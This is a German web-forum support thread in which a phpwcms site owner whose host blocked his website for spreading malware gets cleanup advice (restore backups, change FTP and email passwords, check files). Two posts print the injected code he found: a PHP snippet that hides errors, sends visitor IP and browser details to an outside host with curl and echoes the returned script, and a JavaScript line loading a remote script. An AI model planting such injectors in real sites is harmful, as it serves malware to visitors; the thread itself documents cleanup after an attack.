Webseite gesperrt wg Malwareverbreitung

Hier bekommst Du deutschsprachigen Support. Keine Fehlermeldungen oder Erweiterungswünsche bitte!
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Hallo,
mich hat es auch erwischt, Webseite gesperrt wegen Malwareverbreitung. Den Artikel hier im Forum bezüglich Malware habe ich schon durchgelesen, aber ich weiß nicht so recht was man nun tun muss.
Ein Anruf beim Provider St__to brachte wenig. "Es sei unverantwortlich Verzeichnisrechte auf 777 zu haben. Außerdem müsse in der php.ini safe mode auf "on" sein."

So schaut es aus, die beschriebenen js Dateien sind modifiziert bzw installiert. Alles mit Datum 2014.

Die Bilder wurden gelöscht, da google in chrome Browsern automatisch auf Warnseiten leitet


Fragen:
Was tut man nun um das zu bereinigen?
Woher kommt das und wie kann man das in Zukunft vermeiden? Das FTP-Passwort habe ich schon mal geändert...

Lieben Gruß
Klaus
Last edited by andalucia on Thu 27. Mar 2014, 23:23, edited 1 time in total.
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by Oliver Georgi »

Blödsinnige Aussage des Providers. Beides führt erst mal nicht zu Problemen, solange der Provider sein System ordentlich abgedichtet hätte. Hat er aber nicht, scheint nicht mal einen ordentlichen Virenscanner im Einsatz zu haben. Und wie Du siehst, hat es Dateien getroffen, die eben NICHT! 777 bzw. 666 gesetzt sind, sondern JavaScript Dateien mit 644. Und die sind nur beschreibbar, wenn der Provider Scheiße gebaut hat bei der Systemkonfiguration bzw. wenn jemand per FTP draufgeht oder das System sonstige Lücken hat.

Es hilft nur das Bereinigen der Dateien oder Rückspielen eines Backups. Dann unbedingt den eigenen Rechner auf Malware testen.

Welcher Provider war es denn?
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Hallo Oliver,
danke erst mal. Provider ist Strato. Zuerst kam eine Sperrung durch Guckel, dann vom Provider. Da ich seit 1,5 Jahren als Techniker
weltweit unterwegs war hatte ich an der Seite auch nichts verändert, zumindest dieses Jahr nicht. Definitiv kein FTP.
Eine Infizierung durch meinen Privatrechner scheidet damit aus. War eh nur mit einem relativ hoch gesichertem Firmen NB unterwegs. FTP ports etc sind da disabled.
Wie bereinige ich denn nun? Ich weiß ja zZ noch nicht mal welche Version ich drauf habe, da das gesamte System gesperrt ist.
Der letzte Update der phpwcms-Version war vom 22.05.2012. Was war denn da phpwcmsmässig aktuell?

Ich lade grad von Strato einen Backup vom 2.3.14 runter. Klingt erst mal gut.
Aber, Frage, was ist mit den beiden Dateien aus dem 2-ten Bild?
js.mootools-1.4.default.php
js.jquery.default.php

Die sind beide vom 21.1.14. Brauche ich die auch neu?


LG
Klaus
Last edited by andalucia on Thu 27. Mar 2014, 23:13, edited 1 time in total.
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

OK, der Backup vom 2.3.14 ist restored. Was mir aber noch Kopfzerbrechen bereitet sind die beiden genannten Dateien vom 21.1.14...?
Die liegen zeitlich damit genau zwischen dem Backup vom 2.3.14 und der hier im Forum genannten Malware-Attacken ab dem 15.1.14
Muss da noch was passieren bevor ich da eine Freischaltung bei Provider und Guckel beantrage? Soll ich sie mal posten?
Mein Bauch sagt mir besser erst mal prüfen als das man dann den ganzen Sch__ von vorne hat

LG
Klaus
Last edited by andalucia on Fri 28. Mar 2014, 11:39, edited 1 time in total.
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by Oliver Georgi »

nimm die Dateien und lade sie auf Virustotal. Vergleiche die PHP-Dateien doch einfach mal mit dem Backup-Stand. Dann siehst Du, was da Sache ist. Steht sicher oben/unten irgendwelcher kryptische Kram drinne.
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
kukki
Posts: 1712
Joined: Mon 7. Feb 2005, 20:02
Location: Berlin Köpenick
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by kukki »

Wie mir scheint hast Du auch das Pech gehabt, auf Grund einiger vernachlässigter Sicherheit auf einem Provider in den sauren Apfel beißen zu müssen.
Wenn es Dich tröstet, Du hast nur eine Website zu bearbeiten.

Die Version bekommst Du raus, wenn Du beim Login, was eigentlich noch funktionieren müßte, auf HOME klickst und ganz unten die Version/ Revision abliest ... da steht diese.
Desweiteren: seit 05.01.2014 sind diese Probleme auf vieieielen Providern aufgetreten. eMailkonten und FTP-Konten wurden geknackt und über diesen Weg wurde Schadcode eingefügt. :?

Ich habe darauf hingewiesen, wie man der Sache wieder Herr wird. oder/und auch hier. Letztere Seite stellt Dir kostenlos ein Bots dafür zur Verfügung.

Hinweis:
Ändere kurzfristig Deine FTP-Zugangscodes und Deine eMail-Passworte :!:

Und zum Schluß musst Du über Google-WebmasterTools Deine Website wieder freischalten. Dort genau nachlesen, wie es funktioniert. Dauert ein-zwei Tage und die Website ist wieder frei!
Ich würde einfach mal Deinem Provider Tschüüüüüß sagen. 8)
Lieber arm dran als Arm ab!

meine historische Website: Jagdgeschwader 300 1.9.34-R554
kukki's SpIeLwIeSe V.1.9.33 R553 responsive
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Kukki,
das mit der Version weiß ich. Nur - wie bereits beschrieben - ist die Seite komplett gesperrt => kein Login möglich.
Dazu muss Strato sie erst mal wieder freischalten... Dann erst kommen die Guckel Webmastertools.
Backup ist restored, alle Passwörter sind geändert, Freischaltung ist beantragt.
Warten auf Antwort...

LG
Klaus
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Das kam mir auch komisch vor, habe ich in den beiden verdächtigen Files gefunden und gelöscht:

Code: Select all

<?php
#98d7cb#
error_reporting(0); ini_set('display_errors',0); $wp_axlv96632 = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_axlv96632) && !preg_match ('/bot/i', $wp_axlv96632))){

$wp_axlv0996632="http://"."web"."basefont".".com/font"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_axlv96632);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_axlv0996632);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_96632axlv = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_96632axlv,1,3) === 'scr' ){ echo $wp_96632axlv; }
#/98d7cb#
?>
<?php

?>
User avatar
kukki
Posts: 1712
Joined: Mon 7. Feb 2005, 20:02
Location: Berlin Köpenick
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by kukki »

Die Files musst Du nicht löschen, sondern den angehängten Schadecode!

Und Du kommst nicht einmal per FTP an Deine Seiten ran? Ich glaub's nicht wirklich :evil: Das ist nicht ganz koscher, was Dein Provider da macht. Auch das Sperren einer Seite ist etwas übertrieben!
Lieber arm dran als Arm ab!

meine historische Website: Jagdgeschwader 300 1.9.34-R554
kukki's SpIeLwIeSe V.1.9.33 R553 responsive
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Logo habe ich nur den angehängten Code gelöscht. FTP geht, hatte ja den Backup übertragen, jedoch kein Login ins CMS oder Zugriffe per Browser in zB Work-Directories. Alles www ist tot.

LG
nameless1
Posts: 880
Joined: Sun 27. Apr 2008, 23:22

Re: Webseite gesperrt wg Malwareverbreitung

Post by nameless1 »

kukki wrote:Das ist nicht ganz koscher, was Dein Provider da macht. Auch das Sperren einer Seite ist etwas übertrieben!
nicht unbedingt, bevor die ganze ip oder gar das c-range wegen einer seite irgendwo geblockt werden und tausende in mitleidenschaft zieht.
User avatar
top
Posts: 535
Joined: Fri 11. Aug 2006, 15:03
Location: Eutin

Re: Webseite gesperrt wg Malwareverbreitung

Post by top »

In dem Zusammenhang würde mich interessieren, ob andere Seiten auf dem Server ebenfalls deaktiviert wurden.

Mit Tools wie dem hier kann man sich anzeigen lassen, welche Domains ebenfalls unter der IP erreichbar sind:
http://www.yougetsignal.com/tools/web-s ... eb-server/
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Das kam vor 1 Stunde, Seite geht aber noch nicht:
"Wir haben Ihre Domain abc123nnn.de unter der Kundennummer 1234567890 entsperrt. In Kürze ist Ihre Internetpräsenz wieder in vollem Umfang verfügbar."

Wg Nachfrage
Es waren nur Domains gesperrt welche CMS verwendeten. Andere reine html-Domains waren nicht gesperrt.

LG
Klaus
andalucia
Posts: 114
Joined: Wed 14. Sep 2005, 18:13
Location: Andalusien & Rhein-Main
Contact:

Re: Webseite gesperrt wg Malwareverbreitung

Post by andalucia »

Webseite online, aber...
grrr, Google meldet immer noch infiziert, grrr... :-)

Habe jetzt noch in /template/inc_js/ bei allen 6 js-files das hier gefunden:

Code: Select all

document.write("<script type='text/javascript' src='http://example.com/ZKVdvYC7.php?id=17019822'></"+ "script>");
User avatar
update
Moderator
Posts: 6455
Joined: Mon 10. Jan 2005, 17:29
Location: germany / outdoor

Re: Webseite gesperrt wg Malwareverbreitung

Post by update »

Ich habe, mit Deiner vorausgesetzten Erlaubnis, mal den code durch "...." ersetzt... ;)
It's mostly all about maintaining two or three customer's sites Still supporter for the band Mykket Morton. Visit Mykket Morton on FB. Listen Mykket Morton and live videos on youtube.
Now building a venue for young artists to get wet on stage, rehearsal rooms, a studio, a guitar shop - yes I'm going to build some guitars.
Locked